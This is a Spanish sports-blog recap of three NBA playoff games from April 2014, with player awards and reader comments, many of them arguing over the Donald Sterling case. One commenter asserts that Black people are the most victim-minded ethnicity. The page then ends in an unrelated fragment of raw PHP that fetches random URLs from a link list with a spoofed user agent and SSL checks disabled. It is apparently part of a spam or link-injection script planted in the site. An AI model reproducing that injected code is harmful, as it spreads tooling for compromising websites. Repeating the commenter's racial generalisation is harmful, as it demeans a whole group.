La Crónica: La eliminatoria de las prórrogas

30 de April de 2014 por TheDeerHunter

Es la primera vez en la historia de los playoffs en que asistimos a cuatro duelos consecutivos de la misma serie resueltos en prórroga. Máximo drama con todo un teórico MVP acorralado. No deja de ser curioso el nivel de excelencia con la que se han destapado los Grizzlies en los tiempos extras y más aún su capacidad para reponerse de sus propios errores para producirlas. Ayer volvió a ocurrir: partido razonablemente controlado durante la inmensa mayor parte del mismo, arreón final de los Thunder con cierto aroma a pañales cargados en los Grizzlies y robo decisivo de Westbrook a Conley para forzar el tiempo extra. Todo se resolvió con un par de triplazos de un viejo rockero como Mike Miller y la fortuna en forma de palmeo de Ibaka milésimas después de tiempo (100-99).

Por cierto, descacharrante la que había liado Joey Crawford instantes antes en medio de una serie de tiros libres críticos de Durant, quitándole el balón de las manos justo antes de tirar el segundo para berrear en la mesa no sabemos muy bien el qué. Lo falló y perdieron de 1. Qué bromista. Por lo demás, “El pescador” alcanzó los 245 partidos de playoffs disputados, récord absoluto, aunque no lo pudo celebrar. También llama la atención el hecho de que fueron los Grizzlies los que anoche cosieron a los Thunder a contraataques y no al revés, igual que en puntos en la zona. Ya es lo que les faltaba a Oklahoma. Sólo el acierto en el triple les salvó de una derrota más clara. No queremos ni imaginar el recibimiento que les espera en Memphis. Nadie dijo que fuera fácil y la grandeza se construye con este tipo de gestas. Durant mueve ficha. 

En Los Angeles, la gente celebró la resolución ejemplar de la liga del caso Sterling con una actitud ejemplar arropando a su equipo. Los Clippers recibieron una dósis anímica que probablemente no esperaban pocas horas antes. Después de haber jugado su peor partido hace un par de días DeAndre explotó y se convirtió en el mejor de la noche destrozando la zona de los Warriors. El banco de los Clippers también funcionó muy bien y Stephen Curry tuvo un día para olvidar en la dirección con 8 pérdidas por 4 asistencia. A pesar del gran desempeño del resto de titulares de Golden State tocaba derrota y a buscar otra machada en casa (103-113). Por cierto, no deja de ser irónico que sea la tercera serie de playoffs que hubiera vivido Sterling desde que compró el equipo. La miel de abeja no está hecha para la boca del asno.

Por último, final del camino de los Chicago Bulls, totalmente fundidos a estas alturas. Sólo les faltaba la lesión de Gibson y los problemas físicos de Noah para terminar de claudicar. En un partido bastante regular de los Wizards no alcanzaron los 70 puntos (75-69). Es una lástima pero es evidente que ellos están más preparados ahora mismo para afrontar otras batallas. Nene decisivo nuevamente. Su hipotético duelo contra Millsap puede ser impresionante.

PREMIOS

MVP: 25 puntos (y porque solo anotó 9 de 17 lanzamientos de tiros libres), 18 rebotes y 4 tapones. DeAndre Jordan abusó anoche del pobre juego interior de los Warriors probablemente espoleado por la sanción de por vida a Sterling.

Sorpresa: Para momentos como este ficharon los Grizzlies a Mike Miller este verano. El veterano alero anotó 21 puntos con un 5 de 8 en triples y se convirtió en la respuesta que necesitaba el equipo en momentos de atasco. Además, capturó 6 rebotes, repartió 3 asistencias y recuperó 3 balones.

Decepción: Stephen Curry anotó 17 puntos pero perdió 8 balones. Peor lo hicieron sus compañeros Steve Blake y Jordan Crawford que solo fueron capaces de anotar 2 puntos y repartir 1 asistencia entre ambos. Me imagino a Mark Jackson enfundado en cuero diciendo “Busco a Jack, Jarrett Jack”.

Esfuerzo en vano: Russell Westbrook se marcó un triple doble tremendo de 30 puntos, 10 rebotes y 13 asistencias pero su porcentaje de acierto fue del 32%. Andre Iguodala se quedó cerca del triple doble con 18 puntos, 8 rebotes y 8 asistencias, además de 2 robos. Ambos perdieron y quedan al borde de la eliminación.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Hace tiempo leí lo emocional que era DeAndre Jordan y como Doc Rivers ha sabido insuflarle de confianza.Su rendimiento de ayer en comparación con el 4º partido de la serie (0 puntos,6 rebotes creo recordar) es una muesca más para aquellos que señalan que es un jugador de darle vueltas al coco y sentirse querido.El día que firmó por 10 millones anuales todos nos echamos las manos a la cabeza pero el tiempo parece estar dándole la razón.

    Se está cumpliendo el guión para que Melo salga de los Knicks,los que sonaban como sus próximos equipos están KO o casi.Lakers fuerísima desde hace tiempo,Chicago recién eliminados,con problemas de anotación graves y Houston en la cuenta final y eliminados salvo machada.Verano divertido.

      Citar

  2. Denise dice:
    #2

    “En Los Angeles, la gente celebró la resolución ejemplar de la liga del caso Sterling con una actitud ejemplar arropando a su equipo”
    Yo no estoy del todo de acuerdo en esto. El racismo hay que condenarlo, por supuesto, pero en todas sus formas y no solo cuando haya intereses de por medio.
    Según sale ahora en todos lados, este no es el primer incidente “racista” de Sterling, y pregunto ¿por qué la NBA no toma medida antes? Por qué no interesaba en ese momento? ¿Los Clippers eran un equipo de mierda y no habñia compradores? Ahora por H ó por B, y/o intereses de mucha gente poderosa de comprar los Clippers, ese equipo de moda de Griffin y Paul, aprovechan el incidente para intentar cargarse a Sterling, el cual, su comentario es desafortunado, pero no olvidemos que se trata de una conversación PRIVADA. Y todos, repito, todos si nos colocaran una microfono las 24 horas en una semana, diriamos algo que atente contra algún colectivo.

    Por otra parte, los negros son la etnia más victimista que existe, si Sterling le hubiese dicho a su “novia” negra/hispana (gran racista Sterling, si señor) “no te relaciones con blancos ni me los traigas al basket”, entonces no pasa absolutamente nada. Me hace gracia el payaso de Snoop Dogg hablando de racismo cuando lleva como 3 años hablando de patear el culo blanco de Gasol, (por no hablar de su mierda de música llena de sexismo)

    Total, que Sterling sera un hijo puta de cuidado, pero por detras tiene un montón de interesados aprovechando el incidente para apartarlo y hacerse con el equipo. Y todo este rollo, de que dimita y venda el club me parece lo más hipocrita que he escuchado recientemente.
    Todos los politicos que han salido recientemente criticando el racismo bla bla podrían hablar también de las torturas de presos realizadas por la CIA y la milicia americana; y los que contratan a las cheerleaders, que no discriminen a las gordas, y contraten a 20 tias de 90 kilos en vez de contratar solo a tias buenas y esculturales; los jugadores que dejen de promocionar a Nike/Adidas y otras marcas deportivas con tantas cuentas pendientes por explotación infantil, y asi podríamos seguir con tantos comportamientos no eticos de la sociedad, de los cuales saltan a la luz solo dependiendo del grado de interés que haya. Demagogia e hipocresia 100%

      Citar

  3. Denise dice:
    #3

    Y como digo, en una conversación privada cada uno puede decir lo que le salga de los hue…y todo esto es una trama de los que quieren comprar los Clippers (Magic Johnson of course y sus socios) junto con la joven “novia” de Sterling, (que no le gusta el dinero por cierto..xD) que sabe de sobra que Sterling empleará tintes racistas, y ésta le mete los dedos para que el viejo largue, lo graba y se lo vende a la prensa. Y ahí lo tienes, Sterling quedando como un racista pagafantas, y los que se suman al carro de lo “politicamente correcto” para no perder dinero con su doble moral dando gritos al cielo por lo dicho por el viejo, que aun teniendo un tinte racista no es tan grave porque solo expresa su preferencia de que no invite a sus amigos negros al basket, de igual forma que yo puedo expresar que no quiero que vengan fans de Bisbal a mi casa. Tampoco veo un odio visceral hacia los negros en sus comentarios, oiga.

      Citar

  4. HisRoyalAirness dice:
    #4

    Pues aunque Denise lo diga como lo dice, estoy muy de acuerdo con él (lo cual no quita que aborrezca toda discriminación en cualquiera de sus formas)

      Citar

  5. Denise dice:
    #5

    HisRoyalAirness:
    Pues aunque Denise lo diga como lo dice, estoy muy de acuerdo con él (lo cual no quita que aborrezca toda discriminación en cualquiera de sus formas)

    Es que estoy cansado de tanta hipocresia y victimismo interesado. Con la misma vara de medir que se le está aplicando a Sterling, Kobe Bryant también debería estar fuera de la liga por decirle maricón a un arbitro (y esto si que no fue en una conversación privada) y Garnett tambiién que llamó negrata de mierda a K. Faried creo que fue, y así uno por uno.
    Al final, vamos a llegar a la situación del best-seller de Orwell “1984” donde el Gran Hermano nos decía qué teníamos que decir y nos controlaba nuestras formas de pensar limitandonos la libertad de expresión. Por muy deleznable, mezquino y poco ético que pueda ser, todo el mundo tiene derecho en su intimidad a ser racista, machista, feminista, de derechas, de izquierdas, nacionalista, terrorista o cualquier comportamiento no políticamente correcto. Mientras no se incumpla la ley, todo el mundo tiene derecho a decir y pensar lo que le da la gana en su intimidad.
    Y si Sterling se enjuicia con la NBA por expropiación, si el poder judicial es justo y no está viciado, ganaría Sterling de calle porque las leyes lo amparan.

      Citar

  6. TheDeerHunter dice:
    #6

    Yo creo que no es una cuestión de hipocresía. Es una cuestión de simple pragmatismo.
    Para empezar los Clippers son una franquicia. No es exáctamente una propiedad privada de Sterling en la que pueda actuar como un cortijo. La liga se debe a su marca.
    Estamos hablando de un negocio basado fundamentalmente en la raza a la que el tipo desprecia. 3 de 4 jugadores y aproximadamente la mitad de la audiencia. Los prejuicios de imagen que genera el fulano son evidentes.
    La opinión personal que tenga es irrelevante pero al haber sido hecha pública se hace incompatible con el cargo. Es perfecto como se ha movido la liga en ese sentido.

    Por otro lado hace falta ser anormal… pero aquí no viene al caso.

      Citar

  7. Denise dice:
    #7

    TheDeerHunter:
    Yo creo que no es una cuestión de hipocresía. Es una cuestión de simple pragmatismo.
    Para empezar los Clippers son una franquicia. No es exáctamente una propiedad privada de Sterling en la que pueda actuar como un cortijo. La liga se debe a su marca.
    Estamos hablando de un negocio basado fundamentalmente en la raza a la que el tipo desprecia. 3 de 4 jugadores y aproximadamente la mitad de la audiencia. Los prejuicios de imagen que genera el fulano son evidentes.
    La opinión personal que tenga es irrelevante pero al haber sido hecha pública se hace incompatible con el cargo. Es perfecto como se ha movido la liga en ese sentido.

    Por otro lado hace falta ser anormal… pero aquí no viene al caso.

    ¿Tu crees que Sterling desprecia a los negros? Se está tirando a una negra hispana y los desprecia…? Simplemente le dice a su “novia” que no les traiga sus amigos negros con los que se fotografia en redes sociales al palco VIP. Estoy convencido de que si dice cualquier otra raza no se le da al asunto ni el 10% de importancia.
    Y como digo, la doble moral de siempre, Kobe llama maricon a un arbitro y no pasa absolutamente nada.
    Para mi, que puteen a la persona de Sterling por sus valores y opiniones, vale, pero de ahí a que lo fuercen a vender, me parece algo igual de impresentable que las palabras de Sterling

      Citar

  8. TheDeerHunter dice:
    #8

    Lo que trato de explicarte es que lo opinable del asunto es irrelevante. El que a este señor no le gusten los negros, el puré de patatas o los papagallos no es lo que se está juzgando. Y el que tú y yo nos gustara más o menos que hubiera hablado de una u otra raza tampoco sería importante.
    Es de cajón que no es la mejor opción para un negocio agredir a la clientela potencial y en este caso también a la mayoría de tus trabajadores.Hechas públicas, sus creencias son incompatibles con su posición en la liga y el daño que le hace a su imagen es incalculable, por no hablar de lo insostenible en que se convertiría su gestión con él al frente.
    Como franquicia el verdadero dueño de los Clippers es la liga. Puedes considerar a Sterling un simple delegado, del que la liga hace muy bien en desprenderse. Al tipo al final le van a pagar una buena pasta por sus derechos, que no es como si le estuvieran condenando a la hoguera.

    Por otro lado aún estoy menos de acuerdo contigo en comparar un exabrupto en caliente por muy feo que sea a una grabación que le han hecho al fulano en una plácida conversación.

      Citar

  9. Denise dice:
    #9

    A ver, yo tampoco soy el abogado de Sterling ni defiendo sus palabras, solo digo que se le está dando demasiada importancia, y que por detrás tiene un grupo muy hipocrita, victimista e interesado que le ha montado esta encerrona para echarlo.
    Y a nivel de evaluar un delito judicialmente (que en el caso de Sterling ni lo hay, oiga) lo de Bryant es mucho peor que lo de Sterling. En la vida normal si a tu compañero de trabajo le insultas, ya sea un momento caliente o no, te cae un puro y lo mas normal es que te despidan. En cambio, si te pillan rajando con una grabación ilegal, no te pueden despedir, es más, tu tienes el derecho de denunciar a los que te han grabado sin tu consentimiento.
    Concluyendo, me parece genial que la imagen de Sterling se vaya por los suelos, pero lo de forzar a vender ó expropiarlo, me parece un movimiento totalitario.
    Y a partir de ahí, también se debería de investigar entonces otras muchas cosas, como de donde proviene el dinero y cómo se han hecho ricos algunos propietarios actuales.

      Citar

  10. Jose Luis dice:
    #10

    zach randolph sancionado un partido, adiós grizzlies.

    Denise, Vaughn renovado dos años más, contento? xdddd vaya tela, yo no veo al Magic (este año he visto poquísima NBA) pero a ti no te gustaba y confio en tu criterio.

      Citar

  11. Denise dice:
    #11

    Jose Luis:

    Denise, Vaughn renovado dos años más, contento? xdddd vaya tela, yo no veo al Magic (este año he visto poquísima NBA) pero a ti no te gustaba y confio en tu criterio.

    Si, y Hennigan el GM también renovado 2 años. En el caso de Hennigan, correctísima su renovación, en el caso de Vaughn no lo tengo tan claro. Para empezar, es dificil calibrar su trabajo en estos 2 últimos años, porque el equipo no estaba concebido para ganar, si no para dejarse perder, por lo que el 43-121 de balance de victorias/derrotas que acumula en estos dos años tampoco es un dato demoledor que vaya en su contra.
    El caso de por qué no me gusta Vaughn es por qué en este último año, el equipo apenas ha mejorado, defensivamente ha sido un coladero teniendo a su disposición yo diría uno de los equipos más fisicos de la competición, sus rotaciones han sido un desastre, estuve desde la pretemporada reclamando a Kyle O’Quinn en el equipo y en lugar de eso, los primeros meses de la competición tuvo al pufo de Maxiell en el 5 inicial y al bueno de KOQ “inactive”. Hasta que a mitad de la competición, se comenta que a petición de sus superiores, por fin sentó a Maxiell y le dio bola a KOQ; a Harkless lo ha mareado dándole un dia 30 minutos y al siguiente partido 4. Así todo el puto año, por no hablar de lo de Nicholson que solía jugar 8 minutillos en el segundo cuarto y ya no aparecía mas en el partido. Todos los jugadores jovenes de Orlando apenas han mejorado respecto al año anterior, y ofensivamente el equipo no sabe a lo que juega. Además, es un picha fria, apenas grita, apenas regaña a los jugadores, ni calienta partidos, no motiva y no aprieta a los arbitros. Creo que nunca lo he visto discutir y meterle presión al arbitro.
    Pero como digo, no sé si en estos 2 años se ha tocado las pelotas por aquello del tanking y ahora que este año que entra el equipo si va a ir a ganar, demuestra que es un buen coach, ó directamente es malo de remate, por tanto, pienso que es un error renovarlo en estos momentos, aún no ha demostrado nada y su renovación la hubiese dejado para diciembre/enero en caso de que el equipo esté respondiendo y esté colocado en plazas de PO, porque para mí, con el nucleo de jugadores jovenes que tiene, más el Top 5 y el Top 12 que van a llegar en el proximo Draft y el pésimo nivel del Este, todo lo que no sea llegar a PO el año que viene, lo veré como un fracaso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>